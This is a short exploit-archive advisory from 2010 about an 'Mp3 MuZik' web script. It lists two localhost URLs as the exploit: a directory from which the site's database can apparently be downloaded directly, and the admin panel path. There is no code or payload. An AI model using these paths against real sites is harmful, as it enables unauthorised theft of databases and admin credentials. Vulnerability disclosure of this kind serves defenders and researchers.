id: 11771
date: 04/13/2010
title: Mp3 MuZik Data Base Download Vulnerability
author: indoushka
cves: 

==========================================
Mp3 MuZik Data Base Download Vulnerability
==========================================

========================================================================================                 
| # Title    : Mp3 MuZik Data Base Download Vulnerability          
| # Author   : indoushka                                                                                                             
| # Home     : www.iqs3cur1ty.com
   
| # Bug      : DB                                                          
======================      Exploit By indoushka       =================================
 # Exploit  :
  
 
     1 - http://127.0.0.1/Mp3/dbaze/
      
     2 - http://127.0.0.1/Mp3/admin



#  0day.today [2023-03-22]  #